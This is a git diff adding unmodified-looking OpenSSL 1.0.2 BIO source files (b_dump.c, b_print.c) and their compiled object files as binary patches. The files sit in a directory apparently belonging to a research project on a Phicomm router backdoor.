+
+int BIO_dump_indent_fp(FILE *fp, const char *s, int len, int indent)
+{
+    return BIO_dump_indent_cb(write_fp, fp, s, len, indent);
+}
+#endif
+
+static int write_bio(const void *data, size_t len, void *bp)
+{
+    return BIO_write((BIO *)bp, (const char *)data, len);
+}
+
+int BIO_dump(BIO *bp, const char *s, int len)
+{
+    return BIO_dump_cb(write_bio, bp, s, len);
+}
+
+int BIO_dump_indent(BIO *bp, const char *s, int len, int indent)
+{
+    return BIO_dump_indent_cb(write_bio, bp, s, len, indent);
+}
+
+int BIO_hex_string(BIO *out, int indent, int width, unsigned char *data,
+                   int datalen)
+{
+    int i, j = 0;
+
+    if (datalen < 1)
+        return 1;
+
+    for (i = 0; i < datalen - 1; i++) {
+        if (i && !j)
+            BIO_printf(out, "%*s", indent, "");
+
+        BIO_printf(out, "%02X:", data[i]);
+
+        j = (j + 1) % width;
+        if (!j)
+            BIO_printf(out, "\n");
+    }
+
+    if (i && !j)
+        BIO_printf(out, "%*s", indent, "");
+    BIO_printf(out, "%02X", data[datalen - 1]);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_dump.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_dump.o
new file mode 100644
index 0000000000000000000000000000000000000000..29da45c1613805f8f6f24055c835ce6da7626f36
GIT binary patch
literal 4920
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
CWUz7o

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_print.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_print.c
new file mode 100644
index 0000000..5dc7630
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_print.c
@@ -0,0 +1,816 @@
+/* crypto/bio/b_print.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* disable assert() unless BIO_DEBUG has been defined */
+#ifndef BIO_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+
+/*
+ * Stolen from tjh's ssl/ssl_trc.c stuff.
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <ctype.h>
+#include <assert.h>
+#include <limits.h>
+#include "cryptlib.h"
+#ifndef NO_SYS_TYPES_H
+# include <sys/types.h>
+#endif
+#include <openssl/bn.h>         /* To get BN_LLONG properly defined */
+#include <openssl/bio.h>
+
+#if defined(BN_LLONG) || defined(SIXTY_FOUR_BIT)
+# ifndef HAVE_LONG_LONG
+#  define HAVE_LONG_LONG 1
+# endif
+#endif
+
+/***************************************************************************/
+
+/*
+ * Copyright Patrick Powell 1995
+ * This code is based on code written by Patrick Powell <papowell@astart.com>
+ * It may be used for any purpose as long as this notice remains intact
+ * on all source code distributions.
+ */
+
+/*-
+ * This code contains numerious changes and enhancements which were
+ * made by lots of contributors over the last years to Patrick Powell's
+ * original code:
+ *
+ * o Patrick Powell <papowell@astart.com>      (1995)
+ * o Brandon Long <blong@fiction.net>          (1996, for Mutt)
+ * o Thomas Roessler <roessler@guug.de>        (1998, for Mutt)
+ * o Michael Elkins <me@cs.hmc.edu>            (1998, for Mutt)
+ * o Andrew Tridgell <tridge@samba.org>        (1998, for Samba)
+ * o Luke Mewburn <lukem@netbsd.org>           (1999, for LukemFTP)
+ * o Ralf S. Engelschall <rse@engelschall.com> (1999, for Pth)
+ * o ...                                       (for OpenSSL)
+ */
+
+#ifdef HAVE_LONG_DOUBLE
+# define LDOUBLE long double
+#else
+# define LDOUBLE double
+#endif
+
+#ifdef HAVE_LONG_LONG
+# if defined(_WIN32) && !defined(__GNUC__)
+#  define LLONG __int64
+# else
+#  define LLONG long long
+# endif
+#else
+# define LLONG long
+#endif
+
+static void fmtstr(char **, char **, size_t *, size_t *,
+                   const char *, int, int, int);
+static void fmtint(char **, char **, size_t *, size_t *,
+                   LLONG, int, int, int, int);
+static void fmtfp(char **, char **, size_t *, size_t *,
+                  LDOUBLE, int, int, int);
+static void doapr_outch(char **, char **, size_t *, size_t *, int);
+static void _dopr(char **sbuffer, char **buffer,
+                  size_t *maxlen, size_t *retlen, int *truncated,
+                  const char *format, va_list args);
+
+/* format read states */
+#define DP_S_DEFAULT    0
+#define DP_S_FLAGS      1
+#define DP_S_MIN        2
+#define DP_S_DOT        3
+#define DP_S_MAX        4
+#define DP_S_MOD        5
+#define DP_S_CONV       6
+#define DP_S_DONE       7
+
+/* format flags - Bits */
+#define DP_F_MINUS      (1 << 0)
+#define DP_F_PLUS       (1 << 1)
+#define DP_F_SPACE      (1 << 2)
+#define DP_F_NUM        (1 << 3)
+#define DP_F_ZERO       (1 << 4)
+#define DP_F_UP         (1 << 5)
+#define DP_F_UNSIGNED   (1 << 6)
+
+/* conversion flags */
+#define DP_C_SHORT      1
+#define DP_C_LONG       2
+#define DP_C_LDOUBLE    3
+#define DP_C_LLONG      4
+
+/* some handy macros */
+#define char_to_int(p) (p - '0')
+#define OSSL_MAX(p,q) ((p >= q) ? p : q)
+
+static void
+_dopr(char **sbuffer,
+      char **buffer,
+      size_t *maxlen,
+      size_t *retlen, int *truncated, const char *format, va_list args)
+{
+    char ch;
+    LLONG value;
+    LDOUBLE fvalue;
+    char *strvalue;
+    int min;
+    int max;
+    int state;
+    int flags;
+    int cflags;
+    size_t currlen;
+
+    state = DP_S_DEFAULT;
+    flags = currlen = cflags = min = 0;
+    max = -1;
+    ch = *format++;
+
+    while (state != DP_S_DONE) {
+        if (ch == '\0' || (buffer == NULL && currlen >= *maxlen))
+            state = DP_S_DONE;
+
+        switch (state) {
+        case DP_S_DEFAULT:
+            if (ch == '%')
+                state = DP_S_FLAGS;
+            else
+                doapr_outch(sbuffer, buffer, &currlen, maxlen, ch);
+            ch = *format++;
+            break;
+        case DP_S_FLAGS:
+            switch (ch) {
+            case '-':
+                flags |= DP_F_MINUS;
+                ch = *format++;
+                break;
+            case '+':
+                flags |= DP_F_PLUS;
+                ch = *format++;
+                break;
+            case ' ':
+                flags |= DP_F_SPACE;
+                ch = *format++;
+                break;
+            case '#':
+                flags |= DP_F_NUM;
+                ch = *format++;
+                break;
+            case '0':
+                flags |= DP_F_ZERO;
+                ch = *format++;
+                break;
+            default:
+                state = DP_S_MIN;
+                break;
+            }
+            break;
+        case DP_S_MIN:
+            if (isdigit((unsigned char)ch)) {
+                min = 10 * min + char_to_int(ch);
+                ch = *format++;
+            } else if (ch == '*') {
+                min = va_arg(args, int);
+                ch = *format++;
+                state = DP_S_DOT;
+            } else
+                state = DP_S_DOT;
+            break;
+        case DP_S_DOT:
+            if (ch == '.') {
+                state = DP_S_MAX;
+                ch = *format++;
+            } else
+                state = DP_S_MOD;
+            break;
+        case DP_S_MAX:
+            if (isdigit((unsigned char)ch)) {
+                if (max < 0)
+                    max = 0;
+                max = 10 * max + char_to_int(ch);
+                ch = *format++;
+            } else if (ch == '*') {
+                max = va_arg(args, int);
+                ch = *format++;
+                state = DP_S_MOD;
+            } else
+                state = DP_S_MOD;
+            break;
+        case DP_S_MOD:
+            switch (ch) {
+            case 'h':
+                cflags = DP_C_SHORT;
+                ch = *format++;
+                break;
+            case 'l':
+                if (*format == 'l') {
+                    cflags = DP_C_LLONG;
+                    format++;
+                } else
+                    cflags = DP_C_LONG;
+                ch = *format++;
+                break;
+            case 'q':
+                cflags = DP_C_LLONG;
+                ch = *format++;
+                break;
+            case 'L':
+                cflags = DP_C_LDOUBLE;
+                ch = *format++;
+                break;
+            default:
+                break;
+            }
+            state = DP_S_CONV;
+            break;
+        case DP_S_CONV:
+            switch (ch) {
+            case 'd':
+            case 'i':
+                switch (cflags) {
+                case DP_C_SHORT:
+                    value = (short int)va_arg(args, int);
+                    break;
+                case DP_C_LONG:
+                    value = va_arg(args, long int);
+                    break;
+                case DP_C_LLONG:
+                    value = va_arg(args, LLONG);
+                    break;
+                default:
+                    value = va_arg(args, int);
+                    break;
+                }
+                fmtint(sbuffer, buffer, &currlen, maxlen,
+                       value, 10, min, max, flags);
+                break;
+            case 'X':
+                flags |= DP_F_UP;
+                /* FALLTHROUGH */
+            case 'x':
+            case 'o':
+            case 'u':
+                flags |= DP_F_UNSIGNED;
+                switch (cflags) {
+                case DP_C_SHORT:
+                    value = (unsigned short int)va_arg(args, unsigned int);
+                    break;
+                case DP_C_LONG:
+                    value = (LLONG) va_arg(args, unsigned long int);
+                    break;
+                case DP_C_LLONG:
+                    value = va_arg(args, unsigned LLONG);
+                    break;
+                default:
+                    value = (LLONG) va_arg(args, unsigned int);
+                    break;
+                }
+                fmtint(sbuffer, buffer, &currlen, maxlen, value,
+                       ch == 'o' ? 8 : (ch == 'u' ? 10 : 16),
+                       min, max, flags);
+                break;
+            case 'f':
+                if (cflags == DP_C_LDOUBLE)
+                    fvalue = va_arg(args, LDOUBLE);
+                else
+                    fvalue = va_arg(args, double);
+                fmtfp(sbuffer, buffer, &currlen, maxlen,
+                      fvalue, min, max, flags);
+                break;
+            case 'E':
+                flags |= DP_F_UP;
+            case 'e':
+                if (cflags == DP_C_LDOUBLE)
+                    fvalue = va_arg(args, LDOUBLE);
+                else
+                    fvalue = va_arg(args, double);
+                break;
+            case 'G':
+                flags |= DP_F_UP;
+            case 'g':
+                if (cflags == DP_C_LDOUBLE)
+                    fvalue = va_arg(args, LDOUBLE);
+                else
+                    fvalue = va_arg(args, double);
+                break;
+            case 'c':
+                doapr_outch(sbuffer, buffer, &currlen, maxlen,
+                            va_arg(args, int));
+                break;
+            case 's':
+                strvalue = va_arg(args, char *);
+                if (max < 0) {
+                    if (buffer)
+                        max = INT_MAX;
+                    else
+                        max = *maxlen;
+                }
+                fmtstr(sbuffer, buffer, &currlen, maxlen, strvalue,
+                       flags, min, max);
+                break;
+            case 'p':
+                value = (long)va_arg(args, void *);
+                fmtint(sbuffer, buffer, &currlen, maxlen,
+                       value, 16, min, max, flags | DP_F_NUM);
+                break;
+            case 'n':          /* XXX */
+                if (cflags == DP_C_SHORT) {
+                    short int *num;
+                    num = va_arg(args, short int *);
+                    *num = currlen;
+                } else if (cflags == DP_C_LONG) { /* XXX */
+                    long int *num;
+                    num = va_arg(args, long int *);
+                    *num = (long int)currlen;
+                } else if (cflags == DP_C_LLONG) { /* XXX */
+                    LLONG *num;
+                    num = va_arg(args, LLONG *);
+                    *num = (LLONG) currlen;
+                } else {
+                    int *num;
+                    num = va_arg(args, int *);
+                    *num = currlen;
+                }
+                break;
+            case '%':
+                doapr_outch(sbuffer, buffer, &currlen, maxlen, ch);
+                break;
+            case 'w':
+                /* not supported yet, treat as next char */
+                ch = *format++;
+                break;
+            default:
+                /* unknown, skip */
+                break;
+            }
+            ch = *format++;
+            state = DP_S_DEFAULT;
+            flags = cflags = min = 0;
+            max = -1;
+            break;
+        case DP_S_DONE:
+            break;
+        default:
+            break;
+        }
+    }
+    *truncated = (currlen > *maxlen - 1);
+    if (*truncated)
+        currlen = *maxlen - 1;
+    doapr_outch(sbuffer, buffer, &currlen, maxlen, '\0');
+    *retlen = currlen - 1;
+    return;
+}
+
+static void
+fmtstr(char **sbuffer,
+       char **buffer,
+       size_t *currlen,
+       size_t *maxlen, const char *value, int flags, int min, int max)
+{
+    int padlen, strln;
+    int cnt = 0;
+
+    if (value == 0)
+        value = "<NULL>";
+    for (strln = 0; value[strln]; ++strln) ;
+    padlen = min - strln;
+    if (padlen < 0)
+        padlen = 0;
+    if (flags & DP_F_MINUS)
+        padlen = -padlen;
+
+    while ((padlen > 0) && (cnt < max)) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, ' ');
+        --padlen;
+        ++cnt;
+    }
+    while (*value && (cnt < max)) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, *value++);
+        ++cnt;
+    }
+    while ((padlen < 0) && (cnt < max)) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, ' ');
+        ++padlen;
+        ++cnt;
+    }
+}
+
+static void
+fmtint(char **sbuffer,
+       char **buffer,
+       size_t *currlen,
+       size_t *maxlen, LLONG value, int base, int min, int max, int flags)
+{
+    int signvalue = 0;
+    const char *prefix = "";
+    unsigned LLONG uvalue;
+    char convert[DECIMAL_SIZE(value) + 3];
+    int place = 0;
+    int spadlen = 0;
+    int zpadlen = 0;
+    int caps = 0;
+
+    if (max < 0)
+        max = 0;
+    uvalue = value;
+    if (!(flags & DP_F_UNSIGNED)) {
+        if (value < 0) {
+            signvalue = '-';
+            uvalue = -value;
+        } else if (flags & DP_F_PLUS)
+            signvalue = '+';
+        else if (flags & DP_F_SPACE)
+            signvalue = ' ';
+    }
+    if (flags & DP_F_NUM) {
+        if (base == 8)
+            prefix = "0";
+        if (base == 16)
+            prefix = "0x";
+    }
+    if (flags & DP_F_UP)
+        caps = 1;
+    do {
+        convert[place++] = (caps ? "0123456789ABCDEF" : "0123456789abcdef")
+            [uvalue % (unsigned)base];
+        uvalue = (uvalue / (unsigned)base);
+    } while (uvalue && (place < (int)sizeof(convert)));
+    if (place == sizeof(convert))
+        place--;
+    convert[place] = 0;
+
+    zpadlen = max - place;
+    spadlen =
+        min - OSSL_MAX(max, place) - (signvalue ? 1 : 0) - strlen(prefix);
+    if (zpadlen < 0)
+        zpadlen = 0;
+    if (spadlen < 0)
+        spadlen = 0;
+    if (flags & DP_F_ZERO) {
+        zpadlen = OSSL_MAX(zpadlen, spadlen);
+        spadlen = 0;
+    }
+    if (flags & DP_F_MINUS)
+        spadlen = -spadlen;
+
+    /* spaces */
+    while (spadlen > 0) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, ' ');
+        --spadlen;
+    }
+
+    /* sign */
+    if (signvalue)
+        doapr_outch(sbuffer, buffer, currlen, maxlen, signvalue);
+
+    /* prefix */
+    while (*prefix) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, *prefix);
+        prefix++;
+    }
+
+    /* zeros */
+    if (zpadlen > 0) {
+        while (zpadlen > 0) {
+            doapr_outch(sbuffer, buffer, currlen, maxlen, '0');
+            --zpadlen;
+        }
+    }
+    /* digits */
+    while (place > 0)
+        doapr_outch(sbuffer, buffer, currlen, maxlen, convert[--place]);
+
+    /* left justified spaces */
+    while (spadlen < 0) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, ' ');
+        ++spadlen;
+    }
+    return;
+}
+
+static LDOUBLE abs_val(LDOUBLE value)
+{
+    LDOUBLE result = value;
+    if (value < 0)
+        result = -value;
+    return result;
+}
+
+static LDOUBLE pow_10(int in_exp)
+{
+    LDOUBLE result = 1;
+    while (in_exp) {
+        result *= 10;
+        in_exp--;
+    }
+    return result;
+}
+
+static long roundv(LDOUBLE value)
+{
+    long intpart;
+    intpart = (long)value;
+    value = value - intpart;
+    if (value >= 0.5)
+        intpart++;
+    return intpart;
+}
+
+static void
+fmtfp(char **sbuffer,
+      char **buffer,
+      size_t *currlen,
+      size_t *maxlen, LDOUBLE fvalue, int min, int max, int flags)
+{
+    int signvalue = 0;
+    LDOUBLE ufvalue;
+    char iconvert[20];
+    char fconvert[20];
+    int iplace = 0;
+    int fplace = 0;
+    int padlen = 0;
+    int zpadlen = 0;
+    int caps = 0;
+    long intpart;
+    long fracpart;
+    long max10;
+
+    if (max < 0)
+        max = 6;
+    ufvalue = abs_val(fvalue);
+    if (fvalue < 0)
+        signvalue = '-';
+    else if (flags & DP_F_PLUS)
+        signvalue = '+';
+    else if (flags & DP_F_SPACE)
+        signvalue = ' ';
+
+    intpart = (long)ufvalue;
+
+    /*
+     * sorry, we only support 9 digits past the decimal because of our
+     * conversion method
+     */
+    if (max > 9)
+        max = 9;
+
+    /*
+     * we "cheat" by converting the fractional part to integer by multiplying
+     * by a factor of 10
+     */
+    max10 = roundv(pow_10(max));
+    fracpart = roundv(pow_10(max) * (ufvalue - intpart));
+
+    if (fracpart >= max10) {
+        intpart++;
+        fracpart -= max10;
+    }
+
+    /* convert integer part */
+    do {
+        iconvert[iplace++] =
+            (caps ? "0123456789ABCDEF" : "0123456789abcdef")[intpart % 10];
+        intpart = (intpart / 10);
+    } while (intpart && (iplace < (int)sizeof(iconvert)));
+    if (iplace == sizeof iconvert)
+        iplace--;
+    iconvert[iplace] = 0;
+
+    /* convert fractional part */
+    do {
+        fconvert[fplace++] =
+            (caps ? "0123456789ABCDEF" : "0123456789abcdef")[fracpart % 10];
+        fracpart = (fracpart / 10);
+    } while (fplace < max);
+    if (fplace == sizeof fconvert)
+        fplace--;
+    fconvert[fplace] = 0;
+
+    /* -1 for decimal point, another -1 if we are printing a sign */
+    padlen = min - iplace - max - 1 - ((signvalue) ? 1 : 0);
+    zpadlen = max - fplace;
+    if (zpadlen < 0)
+        zpadlen = 0;
+    if (padlen < 0)
+        padlen = 0;
+    if (flags & DP_F_MINUS)
+        padlen = -padlen;
+
+    if ((flags & DP_F_ZERO) && (padlen > 0)) {
+        if (signvalue) {
+            doapr_outch(sbuffer, buffer, currlen, maxlen, signvalue);
+            --padlen;
+            signvalue = 0;
+        }
+        while (padlen > 0) {
+            doapr_outch(sbuffer, buffer, currlen, maxlen, '0');
+            --padlen;
+        }
+    }
+    while (padlen > 0) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, ' ');
+        --padlen;
+    }
+    if (signvalue)
+        doapr_outch(sbuffer, buffer, currlen, maxlen, signvalue);
+
+    while (iplace > 0)
+        doapr_outch(sbuffer, buffer, currlen, maxlen, iconvert[--iplace]);
+
+    /*
+     * Decimal point. This should probably use locale to find the correct
+     * char to print out.
+     */
+    if (max > 0 || (flags & DP_F_NUM)) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, '.');
+
+        while (fplace > 0)
+            doapr_outch(sbuffer, buffer, currlen, maxlen, fconvert[--fplace]);
+    }
+    while (zpadlen > 0) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, '0');
+        --zpadlen;
+    }
+
+    while (padlen < 0) {
+        doapr_outch(sbuffer, buffer, currlen, maxlen, ' ');
+        ++padlen;
+    }
+}
+
+static void
+doapr_outch(char **sbuffer,
+            char **buffer, size_t *currlen, size_t *maxlen, int c)
+{
+    /* If we haven't at least one buffer, someone has doe a big booboo */
+    assert(*sbuffer != NULL || buffer != NULL);
+
+    if (buffer) {
+        while (*currlen >= *maxlen) {
+            if (*buffer == NULL) {
+                if (*maxlen == 0)
+                    *maxlen = 1024;
+                *buffer = OPENSSL_malloc(*maxlen);
+                if (*currlen > 0) {
+                    assert(*sbuffer != NULL);
+                    memcpy(*buffer, *sbuffer, *currlen);
+                }
+                *sbuffer = NULL;
+            } else {
+                *maxlen += 1024;
+                *buffer = OPENSSL_realloc(*buffer, *maxlen);
+            }
+        }
+        /* What to do if *buffer is NULL? */
+        assert(*sbuffer != NULL || *buffer != NULL);
+    }
+
+    if (*currlen < *maxlen) {
+        if (*sbuffer)
+            (*sbuffer)[(*currlen)++] = (char)c;
+        else
+            (*buffer)[(*currlen)++] = (char)c;
+    }
+
+    return;
+}
+
+/***************************************************************************/
+
+int BIO_printf(BIO *bio, const char *format, ...)
+{
+    va_list args;
+    int ret;
+
+    va_start(args, format);
+
+    ret = BIO_vprintf(bio, format, args);
+
+    va_end(args);
+    return (ret);
+}
+
+int BIO_vprintf(BIO *bio, const char *format, va_list args)
+{
+    int ret;
+    size_t retlen;
+    char hugebuf[1024 * 2];     /* Was previously 10k, which is unreasonable
+                                 * in small-stack environments, like threads
+                                 * or DOS programs. */
+    char *hugebufp = hugebuf;
+    size_t hugebufsize = sizeof(hugebuf);
+    char *dynbuf = NULL;
+    int ignored;
+
+    dynbuf = NULL;
+    CRYPTO_push_info("doapr()");
+    _dopr(&hugebufp, &dynbuf, &hugebufsize, &retlen, &ignored, format, args);
+    if (dynbuf) {
+        ret = BIO_write(bio, dynbuf, (int)retlen);
+        OPENSSL_free(dynbuf);
+    } else {
+        ret = BIO_write(bio, hugebuf, (int)retlen);
+    }
+    CRYPTO_pop_info();
+    return (ret);
+}
+
+/*
+ * As snprintf is not available everywhere, we provide our own
+ * implementation. This function has nothing to do with BIOs, but it's
+ * closely related to BIO_printf, and we need *some* name prefix ... (XXX the
+ * function should be renamed, but to what?)
+ */
+int BIO_snprintf(char *buf, size_t n, const char *format, ...)
+{
+    va_list args;
+    int ret;
+
+    va_start(args, format);
+
+    ret = BIO_vsnprintf(buf, n, format, args);
+
+    va_end(args);
+    return (ret);
+}
+
+int BIO_vsnprintf(char *buf, size_t n, const char *format, va_list args)
+{
+    size_t retlen;
+    int truncated;
+
+    _dopr(&buf, NULL, &n, &retlen, &truncated, format, args);
+
+    if (truncated)
+        /*
+         * In case of truncation, return -1 like traditional snprintf.
+         * (Current drafts for ISO/IEC 9899 say snprintf should return the
+         * number of characters that would have been written, had the buffer
+         * been large enough.)
+         */
+        return -1;
+    else
+        return (retlen <= INT_MAX) ? (int)retlen : -1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_print.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_print.o
new file mode 100644
index 0000000000000000000000000000000000000000..33631e083703766fafcb3437e72ccc8d8103a242
GIT binary patch
literal 9584
zcmdT|eQ;CPmA|s&ATZGrA8i!Erb_e3*a15dm|(Yr=otyFng=+s4JL&uM%abLV8?z6
zuuFodtb|uZl-=26l9^05vzyE&)9p5yO&goEM3^r-lwu$$1i}uaJ6X93nZ!v9XtTUM
z=f3;o=Z6WMcJ`0GGkW*l-#zEt^Ugi@ob$9jBrhtm*@)3>WC0nO87Lv2dPl|qHVlx-
zWD=29gjG#iE~n=rC^dxCgHnB1{cQtPzpSI`N$EkF9FEn}ls)`ihuG0R_#+^rsmBRT
zYOx@$Im3q?B5?q7YQDJVND(2jI-EsmG*v>?5K#6j&TwiTRS$puQuy#VTneWuMOr<l
